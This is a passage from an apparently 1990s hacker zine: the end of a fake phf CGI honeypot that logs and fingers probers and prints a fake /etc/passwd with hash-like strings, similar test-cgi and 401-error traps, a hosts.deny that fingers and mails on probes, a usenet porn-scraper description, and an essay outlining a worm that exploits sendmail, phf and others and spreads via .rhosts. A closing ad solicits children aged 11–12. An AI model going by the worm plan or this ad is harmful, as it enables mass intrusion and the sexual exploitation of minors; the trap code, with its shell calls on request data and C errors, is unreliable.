fingerinfo=fopen("/var/tmp/.fingerinfo1", "r");
fgets(fingerbuf, 2047, fingerinfo);
fclose(fingerinfo);


fprintf(tmpfile, "I did a finger of the person trying to exploit us:\n");
fprintf(tmpfile, "--------------------------------------------------\n");
fputs(fingerbuf, tmpfile);

fclose(tmpfile);

system("mail -s \"SOMEONE USED phf!!\" root </var/tmp/.phf");

unlink("/var/tmp/.fingerinfo1");
unlink("/var/tmp/.phf"); 

printf("Content-type: text/html\n\n");
printf("<H1>Query Results</H1>\n");
printf("<P>\n");
printf("/usr/local/bin/ph -m  alias=x \n");
printf("cat /etc/passwd\n");
printf("<PRE>\n");
printf("root:TQoabYuFUSoSk:0:1:Operator:/:/bin/csh\n");
printf("nobody:*:65534:65534::/:\n");
printf("daemon:*:1:1::/:\n");
printf("sys:*:2:2::/:/bin/csh\n");
printf("bin:*:3:3::/bin:\n");
printf("uucp:*:4:8::/var/spool/uucppublic:\n");
printf("news:*:6:6::/var/spool/news:/bin/csh\n");
printf("ingres:*:7:7::/usr/ingres:/bin/csh\n");
printf("mail:*:8:12::/:\n");
printf("johnny:Abx4dgSg:MaTr|x:/home/MaTrix:/bin/sh\n");
printf("audit:*:9:9::/etc/security/audit:/bin/csh\n");
printf("sync::1:1::/:/bin/sync\n");
printf("kill8r:AfBs45Syf:100:25:Siko:/home/Siko:/bin/sh\n");
printf("ppp::70:70:PPP login:/tmp:/etc/ppplogin\n");
printf("sysdiag:*:0:1:Old System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag\n");
printf("sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sundiag\n");
printf("ftp:*:10:20:ftp:/home/ftp:/usr/bin/bash\n");
printf("luseruser:xAFjgodjFa4:254:100:Pr0t0:/home/Pr0t0c0l:/bin/sh\n");
printf("babum:aDtg3Gs645:BiT-#hacker:454:100:/home/BiT:/bin/sh\n");
printf("www:*:30:30:World Wide Web:/home/www:/usr/bin/bash\n");
printf("pop:*:70:70:Post Office Protocol:/var/spool/pop:/usr/bin/bash\n");
printf("zirzlaff:.a6RPNtUhGW0k:3190:100:Torsten Zirzlaff:/home/tz:/usr/local/bin/tcsh\n");
printf("f33r:A23gAdcYf5:4110:100:f33r me bitch:/home/hph:/usr/local/bin/tcsh\n");
printf("henrik:v50YvKjFwWw.M:4120:18:HeNriK:/usr/sirius/henrik:/usr/bin/bash\n");
printf("inas:fStcY3^gf:8900:100:InaSaLoser:/home/is:/usr/local/bin/tcsh\n");
printf("ivo:*:8920:100:Da Tru hacker-Lamer:/home/ivo:/usr/local/bin/tcsh\n");
printf("pcguest::7454:100:Temp hax0r account:/tmp:/usr/bin/sh\n");
printf("simone:Em8y0pwT.5umo:8930:100:Simone Kleine:/home/simone:/usr/bin/bash\n");
printf("shko:aDrsBsefYr:666:100:SHLRP:/home/shok:/bin/bash\n");
printf("majordomo:*:405:20:Majordomo server:/dev/null:/bin/startdomo\n");
printf("listserv:*:567:20:Listserv server:/dev/null:/bin/sh\n");
printf("hammer:FwhX26Hf1:8940:100:Peter Hammerstein:/home/hammer:/usr/bin/bash\n");
printf("patrick:cYz7MXTIyGByQ:8950:100:Patrick Mergell:/home/patrick:/usr/bin/bash\n");
printf("chr:T/SRcchg0fK3I:8960:100:Christian Zemlin:/home/chr:/usr/bin/bash\n");
printf("db:*:8970:100:Dieter Beule:/usr/sirius/dieter:/usr/bin/bash\n");
printf("guest:AefxF2a2D:8999:110:Guest:/home/guest:/usr/local/bin/tcsh\n");
printf("</PRE>");
}				 

This is what the above will show up in the root's mail:


The following person used phf!!

        Host: ts037d12.chi-il.concentric.net
        Address: 206.173.188.168
        User (if able): (null)
        Ident (if able): (null)
        Browser type: (null)
        Query String (aka command entered): Qalias=X%0aid

I did a finger of the person trying to exploit us:
--------------------------------------------------
[206.173.188.168]
(probably Win95 which is why there was no output as Win95 doesn't have an
actual "finger" program)




Now for the test-cgi...this does the same thing accept it will send a 
"File Not found" instead:

test-cgi.c:

/* --------------------------------------------------- */
/* test-cgi.c -- test-cgi "trojan" by --==+*~Shok~+*-- */
/* --------------------------------------------------- */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

void main(void)
{ 
  FILE *tmpfile, *fingerinfo;
  char *host *addr, *browser, *query_string;
  char fingerbuf[2048];

  host=getenv("REMOTE_HOST"); 
  addr=getenv("REMOTE_ADDR");
  browser=getenv("HTTP_USER_AGENT");
  query_string=getenv("QUERY_STRING"); 

  /* This is to prevent a finger war, for safety, even though you SHOULD  */
  /* have in.fingerd: LOCAL in your hosts.allow				  */

  if ((strcmp(addr, "206.71.69.243")) || (strcmp(addr,"127.0.0.1")) == 0) exit(0);
  system("finger @$REMOTE_ADDR > /var/tmp/.fingerinfo");

  tmpfile=fopen("/var/tmp/.test-cgi", "w");
  fprintf(tmpfile, "The following person used phf:\n\n");
  fprintf(tmpfile, "\tHost: %s\n", host);
  fprintf(tmpfile, "\tAddress: %s\n", addr);
  fprintf(tmpfile, "\tBrowser type: %s\n ", browser);
  fprintf(tmpfile, "\tQuery String (aka command entered): %s\n\n", query_string);
  fingerinfo=fopen("/var/tmp/.fingerinfo", "r");
  fgets(fingerbuf, 2047, fingerinfo); 
  fclose(fingerinfo);


  fprintf(tmpfile, "I did a finger of the person trying to exploit us:\n");
  fprintf(tmpfile, "--------------------------------------------------\n");
  fputs(fingerbuf, tmpfile);

  fclose(tmpfile);

  /* REPLACE THIS PART WITH WHO YOU WANT TO MAIL IT TO change the root to */
  /* to whatever you want 						  */

  system("mail -s \"SOMEONE USED test-cgi!!\" root < /var/tmp/.test-cgi");

  unlink("/var/tmp/.fingerinfo"); 
  unlink("/var/tmp/.test-cgi"); 

  printf("Content-type: text/html\n\n");
  printf("<h2>File Not found\n</h2>");
  printf("The requested URL /cgi-bin/test-cgi was not found on this server.");

} 



Just as an added bonus here.........
When someone goes to a directory you have .htaccess in, it will send 401,
which is the unauthorized error code (pretty sure it's 401 but not in the
mood to check). Now I editted my srm.conf (usually
/usr/local/etc/httpd/conf/srm.conf), and added this line:

ErrorDocument 401	/cgi-bin/unauthorized.cgi

This is basically like the one above.......except it differs
by the the 'user' part, which lets you know what user it was...this is a
good way to know if there is an unauthorized attempt, and/or what user is
logging into your webpage that is secured......

unauthorized.c:


/* -------------------------------------------------------- */
/* Unauthorized cgi "trojan" script by (--==+*~Shok~*+==--) */
/* -------------------------------------------------------- */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
void main(void)
{
  FILE *tmpfile, *fingerinfo;
  char *host, *addr, *user, *ident, *browser, *query_string;
  char fingerbuf[2048];

  host=getenv("REMOTE_HOST");
  addr=getenv("REMOTE_ADDR");
  user=getenv("REMOTE_USER");
  ident=getenv("REMOTE_IDENT");
  browser=getenv("HTTP_USER_AGENT");
  query_string=getenv("QUERY_STRING");

  /* This can get ugly */
  if ((strcmp(addr, "206.71.69.243"))==0) exit(0);

  system("finger @$REMOTE_ADDR > /var/tmp/.fingerinfo");

  tmpfile=fopen("/var/tmp/.unauthorized", "w");
  fprintf(tmpfile, "The following person has unauthorized access:\n\n");
  fprintf(tmpfile, "\tHost: %s\n", host);
  fprintf(tmpfile, "\tAddress: %s\n", addr);
  fprintf(tmpfile, "\tUser (if able): %s\n", user);
  fprintf(tmpfile, "\tIdent (if able): %s\n", ident);
  fprintf(tmpfile, "\tBrowser type: %s\n ", browser);
  fingerinfo=fopen("/var/tmp/.fingerinfo", "r");
  fgets(fingerbuf, 2047, fingerinfo);
  fclose(fingerinfo);


  fprintf(tmpfile, "I did a finger of the person:\n");
  fprintf(tmpfile, "-----------------------------\n");
  fputs(fingerbuf, tmpfile);

  fclose(tmpfile);

  system("mail -s \"Somone tried unauthorized access\" root </var/tmp/.unauthorized");

  unlink("/var/tmp/.fingerinfo");
  unlink("/var/tmp/.unauthorized");

  printf("Content-type: text/html\n\n");
  printf("<HEAD><TITLE>Unauthorized</TITLE></HEAD>");
  printf("<BODY><H1>Unauthorized</H1>");
  printf("You are unauthorized and unwanted here.\n Go away <FONT COLOR=\"red\">d0rk</FONT><P>");
  printf("</BODY>");

}


Here is my hosts.deny too.........in case you wanted to see it ;)
ALL: .cc.edu: /bin/mail -s "%h from CC.EDU tried to access us!!" root
ALL: .gov, .mil: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "GOV/MIL ATTEMPTED ACCESS from %h!! Using %s." root &
in.telnetd: ALL: /bin/mail -s "%h tried to telnet in" root

#FINGER - Noisy people
#------------
in.fingerd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "FINGER ATTEMPT FROM %h" root & 

#Security reasons
#---------------
in.ftpd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "FTP ATTEMPT FROM %h" root &
in.rlogind: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RLOGIN ATTEMPT FROM %h" root &
#in.telnetd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "TELNET ATTEMPT FROM %h" root &

# PORTMAP 
#-------------
portmap: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "PORTMAP ATTEMPT FROM %h. Using %s" root &

#COMSAT
in.comsat:  spawn /usr/sbin/safe_finger @%h| /bin/mail -s "COMSAT ATTEMPT FROM %h" root &

#REXECD
in.rexecd: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "REXEC ATTEMPT FROM %h" root &

#RSHD
in.rshd:  spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RSHD ATTEMPT FROM %h" root &

#NNRPD
in.nnrpd: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "NNRPD ATTEMPT FROM %h" root &

#RPCBIND
rpcbind: ALL: spawn /usr/sbin/safe_finger @%h| /bin/mail -s "RPCBIND ATTEMPT FROM %h. Using %s" root &

#ALL: paranoid


Well.......................................we're winding down to the end.

It has been fun and I don't have much more to say on this article.
Thanks for reading, please feel free to use and distribute this, although
I wish for you to leave my comments and "header" at the tops ... ya know
my "copyright" :) 

You can access a few of my things at ftp.janova.org (in pub) or
www.janova.org. 

			        Shok
			(--==+*~Shok~*+==--)

Email: shok@sekurity.org

�������������������������������������������������������������������������������
  3. PornBot : TFreak
�������������������������������������������������������������������������������

Pornbot v1.0 by TFreak [08/18/97]

Overview
--------
Pornbot is a config file driven all purpose newsbot for UNIX.  It scans the 
newsgroups found in the config file (pornbot.conf) for encoded binaries and 
saves the decoded image to disk.  

Getting Started
---------------

1)  Edit the UUDECODEPATH variable on line 24 of the source file to point to  
    its location on your system.  If you don't have one, a Linux binary is 
    included with this release. (however, we rm'd the zgv with this release,
    becuase its too fucking big, so copy zgv to the pornbot dir -- so1o)

2)  Edit the pornbot.conf file.  The first entry is an NNTP server to which
    you have read permission on.  The remaining lines are newsgroups in which
    you want pornbot to scan.  The config file is terminated with a $ on a 
    blank line.  ``#'' comments out a line, and blank lines are ignored.

    NOTE:  For memory conservation purposes, the MAXNEWSGROUPS variable is
           included.  If you plan on scanning a lot of newsgroups, up this
           number (default is 15 newsgroups).  If you have more newsgroups
           than whats compiled in, anything after that max will be ignored.

3)  Compile your binary.  
    
    cc -o pornbot pornbot.c

    This should compile fine.  Tested on Linux and FreeBSD.


After this your ready to start downloading!

-tf

�������������������������������������������������������������������������������
4. Crypto Worm (philsophy)
�������������������������������������������������������������������������������

                     Worm for Crypto! (philosophy)
                     -----------------------------
                                  By:
                          --==+(*Shok*)+==--

Well that may of gotten your attention :) Something I realized
when going through some crypto related articles. Consider the
following.....you want to crack rsa, but you know that the MIPS years
required is far too great. Well what if you were, to write an internet
worm, that would exploit system holes, like sendmail, imap, popd, httpd
(brute force), phf, any thing it could to get into the system, and once it
was in, it ran a program for cryptographic related purposes. You could use
this to crack a key or an encryption standard like RSA. It could then mail
it's output to an anonymous server or a news group or somewhere to obtain
your anonymity. But this way, you could be using machines all over the
world to crack something. Now this article is more of a philsopy than
anything, I am just explain this. But think about it.....it could be
useful eh? Here is what it could do:

1.) You could use something like srand() with the date as a seed (or
    just take the code out of an ip scanner, eipscan for example, is a
    nice one), and have it find hosts that way. Also you could use a dns
    scanner at the same time.......no matter however you want to go about
    it.
2.) Try to exploit this host while still scanning for more hosts in the
    parent.
2.) Exploit (get into) the host. 
3.) Get information from /etc/hosts, .rhosts, etc. and repeat step two on
    those hosts (fork another process).
4.) Have your program, output to a file your code for cracking, and
    compile that on the system (you chould put this in the code of the
    worm but I don't think it would be as neat...it'd be too messy.
5.) After running mail the results to something like anon.pinet.fi (or
    whatever it was...) you get the idea. 

You might want it to only mail if certain conditions occur such as
it cracks it or anything. You'd also want to randomly try to crack the
key, and not a sequence, because otherwise, you'd be the whole point, and all
the hosts would be doing the same thing, so all you'd need is the quickest one,
and you certainly don't want that! :)
 
This is just a philosopy I'm not including any code on this one....too
much code and not enough time ;)
	
                          --==+*~(Shok)~*+==--

�������������������������������������������������������������������������������
===============================================================================
==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]==
===============================================================================
�������������������������������������������������������������������������������
--------------------------------------+---------------------------------------
                                      |
           YOUR SPECIAL AD            |            LET'S BE FREE
                                      |
       COULD BE RIGHT HERE #@!        |    Gay White Male 38, 5'11" looking
                                      |    for men, 12 - 32 clean, fit, and
       SEND ELECTRONIC MAIL TO:       |    hairy. Discreet Encounters.
           ADZ@CODEZ.COM              |    Call Anytime : (816)781-8009
                                      |                   (Ask for Tommy)
                                      |
--------------------------------------+---------------------------------------
                                      |
        ARE YOU 11 OR 12 ???          |      FREE FONESEX! CALL ME NOW!@
                                      |
 Looking for men 11 - 12 for adult    |    Yeah huney, you know you want me,
 video satisfaction. I am 35 into     |    I'll treat you just right, I'm
 Professional wrestling.              |    waiting for your call today!
 Let's talk soon : (816)453-8722      |    CALL ME NOW!@# : (847)546-9154
                                      |                     (Ask for Kim)
--------------------------------------+---------------------------------------
�������������������������������������������������������������������������������
                            .oO Team CodeZero Oo.
�������������������������������������������������������������������������������

                      _   /|  k0dekat sez...
                      \'o O'                            
                      =(_o_)=   "EyEm HuNGaRy FoR SKiLLz,
                        U               nOt CaTf00d!!#@"


�������������������������������������������������������������������������������
          Remember, McDonalds Owns You, And Ronald Is The KinG!!!
         Wendy Is Satan!! Don't Believe The Lies!! PHEAR WENDY!@#*
�������������������������������������������������������������������������������



<-- line 2500.